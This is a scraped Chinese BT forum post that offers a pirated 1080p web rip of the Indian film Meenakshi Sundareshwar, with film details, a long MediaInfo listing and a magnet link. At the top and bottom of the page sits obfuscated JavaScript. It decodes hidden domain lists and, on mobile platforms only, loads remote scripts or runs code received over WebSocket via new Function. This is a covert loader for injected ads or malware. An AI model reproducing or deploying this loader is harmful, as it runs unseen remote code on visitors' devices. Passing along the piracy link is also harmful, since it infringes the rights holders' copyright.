单身夫妻[中文字幕].Meenakshi.Sundareshwar.2021.1080p.NF.WEB-DL.DDP5.1.Atmos.x264-bt9527.cc 5.75GB

版主小s 19天前 723

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x68\x6e\x49\x43\x61\x57\x73\x53\x72\x45']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};

◎译 名 单身夫妻

◎片 名 Meenakshi Sundareshwar

◎年 代 2021

◎产 地 印度

◎类 别 喜剧 / 爱情

◎语 言 印地语

◎上映日期 2021-11-05(印度)

◎IMDb链接 https://www.imdb.com/title/tt13529034/

◎豆瓣链接 https://movie.douban.com/subject/35642266/

◎片 长 105分钟

◎演 员 桑亚·玛荷塔 Sanya Malhotra (id:1372458)

阿布希曼努·达萨尼 Abhimanyu Dasani (id:1416305)

◎标 签 爱情 / 2021 / 印度 / 单身夫妻 / 电影 / 喜剧 / M印度 / Movie

◎简 介

因为特殊的工作要求,一对新婚夫妇被迫分居,面对异地婚姻带来的麻烦、问题——当然还有欢笑


  1. ##### MediaInfo ######

  2. General

  3. Unique ID : 17058280205616359117604046775948360125 (0xCD54E25D50EED4385346709873339BD)

  4. Complete name : Meen[email protected]BBQDDQ.COM.mkv

  5. Format : Matroska

  6. Format version : Version 4

  7. File size : 5.75 GiB

  8. Duration : 2 h 21 min

  9. Overall bit rate mode : Variable

  10. Overall bit rate : 5 839 kb/s

  11. Encoded date : UTC 2021-11-14 17:31:55

  12. Writing application : mkvmerge v62.0.0 ('Apollo') 64-bit

  13. Writing library : libebml v1.4.2 + libmatroska v1.6.4


  14. Video

  15. ID : 1

  16. Format : AVC

  17. Format/Info : Advanced Video Codec

  18. Format profile : [email protected]

  19. Format settings : CABAC / 4 Ref Frames

  20. Format settings, CABAC : Yes

  21. Format settings, Reference frames : 4 frames

  22. Codec ID : V_MPEG4/ISO/AVC

  23. Duration : 2 h 21 min

  24. Bit rate mode : Variable

  25. Bit rate : 3 145 kb/s

  26. Maximum bit rate : 20.0 Mb/s

  27. Width : 1 920 pixels

  28. Height : 1 080 pixels

  29. Display aspect ratio : 16:9

  30. Frame rate mode : Constant

  31. Frame rate : 24.000 FPS

  32. Color space : YUV

  33. Chroma subsampling : 4:2:0

  34. Bit depth : 8 bits

  35. Scan type : Progressive

  36. Bits/(Pixel*Frame) : 0.063

  37. Stream size : 3.10 GiB (54%)

  38. Writing library : x264 core 148 r2727 7d026e8

  39. Encoding settings : cabac=1 / ref=4 / deblock=1:0:0 / analyse=0x3:0x111 / me=umh / subme=10 / psy=1 / psy_rd=1.00:0.00 / mixed_ref=1 / me_range=120 / chroma_me=1 / trellis=2 / 8x8dct=1 / cqm=0 / deadzone=21,11 / fast_pskip=1 / chroma_qp_offset=-2 / threads=6 / lookahead_threads=1 / sliced_threads=0 / nr=0 / decimate=1 / interlaced=0 / NTMzNTQ= / bluray_compat=0 / stitchable=1 / constrained_intra=0 / bframes=16 / b_pyramid=2 / b_adapt=2 / b_bias=0 / direct=3 / weightb=1 / open_gop=0 / weightp=2 / keyint=240 / keyint_min=121 / scenecut=0 / intra_refresh=0 / rc_lookahead=240 / rc=crf / mbtree=1 / crf=16.0 / qcomp=0.50 / qpmin=6 / qpmax=51 / qpstep=4 / vbv_maxrate=20000 / vbv_bufsize=25000 / crf_max=0.0 / nal_hrd=vbr / filler=0 / NTMzNTQ=LmsMAP37EqsCpk / ip_ratio=1.40 / aq=1:0.80

  40. Default : Yes

  41. Forced : No


  42. Audio #1

  43. ID : 2

  44. Format : E-AC-3 JOC

  45. Format/Info : Enhanced AC-3 with Joint Object Coding

  46. Commercial name : Dolby Digital Plus with Dolby Atmos

  47. Codec ID : A_EAC3

  48. Duration : 2 h 21 min

  49. Bit rate mode : Constant

  50. Bit rate : 768 kb/s

  51. Channel(s) : 6 channels

  52. Channel layout : L R C LFE Ls Rs

  53. Sampling rate : 48.0 kHz

  54. Frame rate : 31.250 FPS (1536 SPF)

  55. Compression mode : Lossy

  56. Stream size : 775 MiB (13%)

  57. Title : Hindi

  58. Language : Hindi

  59. Service kind : Complete Main

  60. Default : Yes

  61. Forced : No

  62. Complexity index : 16

  63. Number of dynamic objects : 15

  64. Bed channel count : 1 channel

  65. Bed channel configuration : LFE


  66. Audio #2

  67. ID : 3

  68. Format : E-AC-3

  69. Format/Info : Enhanced AC-3

  70. Commercial name : Dolby Digital Plus

  71. Codec ID : A_EAC3

  72. Duration : 2 h 21 min

  73. Bit rate mode : Constant

  74. Bit rate : 640 kb/s

  75. Channel(s) : 6 channels

  76. Channel layout : L R C LFE Ls Rs

  77. Sampling rate : 48.0 kHz

  78. Frame rate : 31.250 FPS (1536 SPF)

  79. Compression mode : Lossy

  80. Stream size : 646 MiB (11%)

  81. Title : English

  82. Language : English

  83. Service kind : Complete Main

  84. Default : No

  85. Forced : No


  86. Audio #3

  87. ID : 4

  88. Format : E-AC-3

  89. Format/Info : Enhanced AC-3

  90. Commercial name : Dolby Digital Plus

  91. Codec ID : A_EAC3

  92. Duration : 2 h 21 min

  93. Bit rate mode : Constant

  94. Bit rate : 640 kb/s

  95. Channel(s) : 6 channels

  96. Channel layout : L R C LFE Ls Rs

  97. Sampling rate : 48.0 kHz

  98. Frame rate : 31.250 FPS (1536 SPF)

  99. Compression mode : Lossy

  100. Stream size : 646 MiB (11%)

  101. Title : Tamil

  102. Language : Tamil

  103. Service kind : Complete Main

  104. Default : No

  105. Forced : No


  106. Audio #4

  107. ID : 5

  108. Format : E-AC-3

  109. Format/Info : Enhanced AC-3

  110. Commercial name : Dolby Digital Plus

  111. Codec ID : A_EAC3

  112. Duration : 2 h 21 min

  113. Bit rate mode : Constant

  114. Bit rate : 640 kb/s

  115. Channel(s) : 6 channels

  116. Channel layout : L R C LFE Ls Rs

  117. Sampling rate : 48.0 kHz

  118. Frame rate : 31.250 FPS (1536 SPF)

  119. Compression mode : Lossy

  120. Stream size : 646 MiB (11%)

  121. Title : Telugu

  122. Language : Telugu

  123. Service kind : Complete Main

  124. Default : No

  125. Forced : No


  126. Text #1

  127. ID : 6

  128. Format : UTF-8

  129. Codec ID : S_TEXT/UTF8

  130. Codec ID/Info : UTF-8 Plain Text

  131. Duration : 2 h 11 min

  132. Bit rate : 51 b/s

  133. Count of elements : 1421

  134. Stream size : 49.2 KiB (0%)

  135. Title : English

  136. Language : English

  137. Default : Yes

  138. Forced : No


  139. Text #2

  140. ID : 7

  141. Format : UTF-8

  142. Codec ID : S_TEXT/UTF8

  143. Codec ID/Info : UTF-8 Plain Text

  144. Duration : 2 h 20 min

  145. Bit rate : 73 b/s

  146. Count of elements : 1460

  147. Stream size : 75.4 KiB (0%)

  148. Title : Arabic

  149. Language : Arabic

  150. Default : No

  151. Forced : No


  152. Text #3

  153. ID : 8

  154. Format : UTF-8

  155. Codec ID : S_TEXT/UTF8

  156. Codec ID/Info : UTF-8 Plain Text

  157. Duration : 2 h 20 min

  158. Bit rate : 43 b/s

  159. Count of elements : 1463

  160. Stream size : 44.5 KiB (0%)

  161. Title : Chinese Simplified

  162. Language : Chinese

  163. Default : No

  164. Forced : No


  165. Text #4

  166. ID : 9

  167. Format : UTF-8

  168. Codec ID : S_TEXT/UTF8

  169. Codec ID/Info : UTF-8 Plain Text

  170. Duration : 2 h 20 min

  171. Bit rate : 45 b/s

  172. Count of elements : 1485

  173. Stream size : 46.6 KiB (0%)

  174. Title : Chinese Traditional

  175. Language : Chinese

  176. Default : No

  177. Forced : No


  178. Text #5

  179. ID : 10

  180. Format : UTF-8

  181. Codec ID : S_TEXT/UTF8

  182. Codec ID/Info : UTF-8 Plain Text

  183. Duration : 2 h 20 min

  184. Bit rate : 41 b/s

  185. Count of elements : 1451

  186. Stream size : 42.2 KiB (0%)

  187. Title : Croatian

  188. Language : Croatian

  189. Default : No

  190. Forced : No


  191. Text #6

  192. ID : 11

  193. Format : UTF-8

  194. Codec ID : S_TEXT/UTF8

  195. Codec ID/Info : UTF-8 Plain Text

  196. Duration : 2 h 20 min

  197. Bit rate : 45 b/s

  198. Count of elements : 1454

  199. Stream size : 46.4 KiB (0%)

  200. Title : Czech

  201. Language : Czech

  202. Default : No

  203. Forced : No


  204. Text #7

  205. ID : 12

  206. Format : UTF-8

  207. Codec ID : S_TEXT/UTF8

  208. Codec ID/Info : UTF-8 Plain Text

  209. Duration : 2 h 20 min

  210. Bit rate : 46 b/s

  211. Count of elements : 1452

  212. Stream size : 48.0 KiB (0%)

  213. Title : Danish

  214. Language : Danish

  215. Default : No

  216. Forced : No


  217. Text #8

  218. ID : 13

  219. Format : UTF-8

  220. Codec ID : S_TEXT/UTF8

  221. Codec ID/Info : UTF-8 Plain Text

  222. Duration : 2 h 20 min

  223. Bit rate : 44 b/s

  224. Count of elements : 1428

  225. Stream size : 45.6 KiB (0%)

  226. Title : Dutch

  227. Language : Dutch

  228. Default : No

  229. Forced : No


  230. Text #9

  231. ID : 14

  232. Format : UTF-8

  233. Codec ID : S_TEXT/UTF8

  234. Codec ID/Info : UTF-8 Plain Text

  235. Duration : 2 h 20 min

  236. Bit rate : 46 b/s

  237. Count of elements : 1453

  238. Stream size : 47.5 KiB (0%)

  239. Title : Finnish

  240. Language : Finnish

  241. Default : No

  242. Forced : No


  243. Text #10

  244. ID : 15

  245. Format : UTF-8

  246. Codec ID : S_TEXT/UTF8

  247. Codec ID/Info : UTF-8 Plain Text

  248. Duration : 2 h 20 min

  249. Bit rate : 48 b/s

  250. Count of elements : 1455

  251. Stream size : 50.2 KiB (0%)

  252. Title : French

  253. Language : French

  254. Default : No

  255. Forced : No


  256. Text #11

  257. ID : 16

  258. Format : UTF-8

  259. Codec ID : S_TEXT/UTF8

  260. Codec ID/Info : UTF-8 Plain Text

  261. Duration : 2 h 20 min

  262. Bit rate : 49 b/s

  263. Count of elements : 1451

  264. Stream size : 50.5 KiB (0%)

  265. Title : German

  266. Language : German

  267. Default : No

  268. Forced : No


  269. Text #12

  270. ID : 17

  271. Format : UTF-8

  272. Codec ID : S_TEXT/UTF8

  273. Codec ID/Info : UTF-8 Plain Text

  274. Duration : 2 h 20 min

  275. Bit rate : 81 b/s

  276. Count of elements : 1457

  277. Stream size : 83.1 KiB (0%)

  278. Title : Greek

  279. Language : Greek

  280. Default : No

  281. Forced : No


  282. Text #13

  283. ID : 18

  284. Format : UTF-8

  285. Codec ID : S_TEXT/UTF8

  286. Codec ID/Info : UTF-8 Plain Text

  287. Duration : 2 h 20 min

  288. Bit rate : 68 b/s

  289. Count of elements : 1461

  290. Stream size : 69.9 KiB (0%)

  291. Title : Hebrew

  292. Language : Hebrew

  293. Default : No

  294. Forced : No


  295. Text #14

  296. ID : 19

  297. Format : UTF-8

  298. Codec ID : S_TEXT/UTF8

  299. Codec ID/Info : UTF-8 Plain Text

  300. Duration : 2 h 20 min

  301. Bit rate : 150 b/s

  302. Count of elements : 1815

  303. Stream size : 154 KiB (0%)

  304. Title : Hindi

  305. Language : Hindi

  306. Default : No

  307. Forced : No


  308. Text #15

  309. ID : 20

  310. Format : UTF-8

  311. Codec ID : S_TEXT/UTF8

  312. Codec ID/Info : UTF-8 Plain Text

  313. Duration : 2 h 19 min

  314. Bit rate : 2 b/s

  315. Count of elements : 130

  316. Stream size : 2.94 KiB (0%)

  317. Title : Hindi (Forced)

  318. Language : Hindi

  319. Default : No

  320. Forced : Yes


  321. Text #16

  322. ID : 21

  323. Format : UTF-8

  324. Codec ID : S_TEXT/UTF8

  325. Codec ID/Info : UTF-8 Plain Text

  326. Duration : 2 h 20 min

  327. Bit rate : 46 b/s

  328. Count of elements : 1452

  329. Stream size : 47.8 KiB (0%)

  330. Title : Hungarian

  331. Language : Hungarian

  332. Default : No

  333. Forced : No


  334. Text #17

  335. ID : 22

  336. Format : UTF-8

  337. Codec ID : S_TEXT/UTF8

  338. Codec ID/Info : UTF-8 Plain Text

  339. Duration : 2 h 20 min

  340. Bit rate : 49 b/s

  341. Count of elements : 1453

  342. Stream size : 51.0 KiB (0%)

  343. Title : Indonesian

  344. Language : Indonesian

  345. Default : No

  346. Forced : No


  347. Text #18

  348. ID : 23

  349. Format : UTF-8

  350. Codec ID : S_TEXT/UTF8

  351. Codec ID/Info : UTF-8 Plain Text

  352. Duration : 2 h 20 min

  353. Bit rate : 47 b/s

  354. Count of elements : 1451

  355. Stream size : 48.9 KiB (0%)

  356. Title : Italian

  357. Language : Italian

  358. Default : No

  359. Forced : No


  360. Text #19

  361. ID : 24

  362. Format : UTF-8

  363. Codec ID : S_TEXT/UTF8

  364. Codec ID/Info : UTF-8 Plain Text

  365. Duration : 2 h 20 min

  366. Bit rate : 48 b/s

  367. Count of elements : 1498

  368. Stream size : 49.3 KiB (0%)

  369. Title : Japanese

  370. Language : Japanese

  371. Default : No

  372. Forced : No


  373. Text #20

  374. ID : 25

  375. Format : UTF-8

  376. Codec ID : S_TEXT/UTF8

  377. Codec ID/Info : UTF-8 Plain Text

  378. Duration : 2 h 20 min

  379. Bit rate : 54 b/s

  380. Count of elements : 1471

  381. Stream size : 55.7 KiB (0%)

  382. Title : Korean

  383. Language : Korean

  384. Default : No

  385. Forced : No


  386. Text #21

  387. ID : 26

  388. Format : UTF-8

  389. Codec ID : S_TEXT/UTF8

  390. Codec ID/Info : UTF-8 Plain Text

  391. Duration : 2 h 20 min

  392. Bit rate : 50 b/s

  393. Count of elements : 1456

  394. Stream size : 51.8 KiB (0%)

  395. Title : Malay

  396. Language : Malay

  397. Default : No

  398. Forced : No


  399. Text #22

  400. ID : 27

  401. Format : UTF-8

  402. Codec ID : S_TEXT/UTF8

  403. Codec ID/Info : UTF-8 Plain Text

  404. Duration : 2 h 20 min

  405. Bit rate : 46 b/s

  406. Count of elements : 1451

  407. Stream size : 47.3 KiB (0%)

  408. Title : Norwegian Bokmal

  409. Language : Norwegian Bokmal

  410. Default : No

  411. Forced : No


  412. Text #23

  413. ID : 28

  414. Format : UTF-8

  415. Codec ID : S_TEXT/UTF8

  416. Codec ID/Info : UTF-8 Plain Text

  417. Duration : 2 h 20 min

  418. Bit rate : 47 b/s

  419. Count of elements : 1451

  420. Stream size : 48.7 KiB (0%)

  421. Title : Polish

  422. Language : Polish

  423. Default : No

  424. Forced : No


  425. Text #24

  426. ID : 29

  427. Format : UTF-8

  428. Codec ID : S_TEXT/UTF8

  429. Codec ID/Info : UTF-8 Plain Text

  430. Duration : 2 h 20 min

  431. Bit rate : 48 b/s

  432. Count of elements : 1453

  433. Stream size : 50.2 KiB (0%)

  434. Title : Portuguese

  435. Language : Portuguese

  436. Default : No

  437. Forced : No


  438. Text #25

  439. ID : 30

  440. Format : UTF-8

  441. Codec ID : S_TEXT/UTF8

  442. Codec ID/Info : UTF-8 Plain Text

  443. Duration : 2 h 20 min

  444. Bit rate : 46 b/s

  445. Count of elements : 1459

  446. Stream size : 47.6 KiB (0%)

  447. Title : Brazilian Portuguese

  448. Language : Portuguese

  449. Default : No

  450. Forced : No


  451. Text #26

  452. ID : 31

  453. Format : UTF-8

  454. Codec ID : S_TEXT/UTF8

  455. Codec ID/Info : UTF-8 Plain Text

  456. Duration : 2 h 20 min

  457. Bit rate : 52 b/s

  458. Count of elements : 1453

  459. Stream size : 53.4 KiB (0%)

  460. Title : Romanian

  461. Language : Romanian

  462. Default : No

  463. Forced : No


  464. Text #27

  465. ID : 32

  466. Format : UTF-8

  467. Codec ID : S_TEXT/UTF8

  468. Codec ID/Info : UTF-8 Plain Text

  469. Duration : 2 h 20 min

  470. Bit rate : 74 b/s

  471. Count of elements : 1461

  472. Stream size : 76.5 KiB (0%)

  473. Title : Russian

  474. Language : Russian

  475. Default : No

  476. Forced : No


  477. Text #28

  478. ID : 33

  479. Format : UTF-8

  480. Codec ID : S_TEXT/UTF8

  481. Codec ID/Info : UTF-8 Plain Text

  482. Duration : 2 h 19 min

  483. Bit rate : 48 b/s

  484. Count of elements : 1458

  485. Stream size : 49.8 KiB (0%)

  486. Title : Spanish

  487. Language : Spanish

  488. Default : No

  489. Forced : No


  490. Text #29

  491. ID : 34

  492. Format : UTF-8

  493. Codec ID : S_TEXT/UTF8

  494. Codec ID/Info : UTF-8 Plain Text

  495. Duration : 2 h 20 min

  496. Bit rate : 45 b/s

  497. Count of elements : 1453

  498. Stream size : 47.2 KiB (0%)

  499. Title : European Spanish

  500. Language : Spanish

  501. Default : No

  502. Forced : No


  503. Text #30

  504. ID : 35

  505. Format : UTF-8

  506. Codec ID : S_TEXT/UTF8

  507. Codec ID/Info : UTF-8 Plain Text

  508. Duration : 2 h 20 min

  509. Bit rate : 45 b/s

  510. Count of elements : 1450

  511. Stream size : 47.1 KiB (0%)

  512. Title : Swedish

  513. Language : Swedish

  514. Default : No

  515. Forced : No


  516. Text #31

  517. ID : 36

  518. Format : UTF-8

  519. Codec ID : S_TEXT/UTF8

  520. Codec ID/Info : UTF-8 Plain Text

  521. Duration : 2 h 20 min

  522. Bit rate : 114 b/s

  523. Count of elements : 1461

  524. Stream size : 118 KiB (0%)

  525. Title : Thai

  526. Language : Thai

  527. Default : No

  528. Forced : No


  529. Text #32

  530. ID : 37

  531. Format : UTF-8

  532. Codec ID : S_TEXT/UTF8

  533. Codec ID/Info : UTF-8 Plain Text

  534. Duration : 2 h 20 min

  535. Bit rate : 47 b/s

  536. Count of elements : 1454

  537. Stream size : 48.9 KiB (0%)

  538. Title : Turkish

  539. Language : Turkish

  540. Default : No

  541. Forced : No


  542. Text #33

  543. ID : 38

  544. Format : UTF-8

  545. Codec ID : S_TEXT/UTF8

  546. Codec ID/Info : UTF-8 Plain Text

  547. Duration : 2 h 20 min

  548. Bit rate : 73 b/s

  549. Count of elements : 1459

  550. Stream size : 75.5 KiB (0%)

  551. Title : Ukrainian

  552. Language : Ukrainian

  553. Default : No

  554. Forced : No


  555. Text #34

  556. ID : 39

  557. Format : UTF-8

  558. Codec ID : S_TEXT/UTF8

  559. Codec ID/Info : UTF-8 Plain Text

  560. Duration : 2 h 20 min

  561. Bit rate : 64 b/s

  562. Count of elements : 1454

  563. Stream size : 66.1 KiB (0%)

  564. Title : Vietnamese

  565. Language : Vietnamese

  566. Default : No

  567. Forced : No


TAGS 喜剧 爱情

磁力链:
  • magnet:?xt=urn:btih:6C2C0085D463F97E81388A6C12944DF8C3309E1B

上传的附件:
BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。
最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回
发新帖
var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNg==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x59\x72\x72\x51\x4e\x72\x4a\x5a\x7a\x42']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};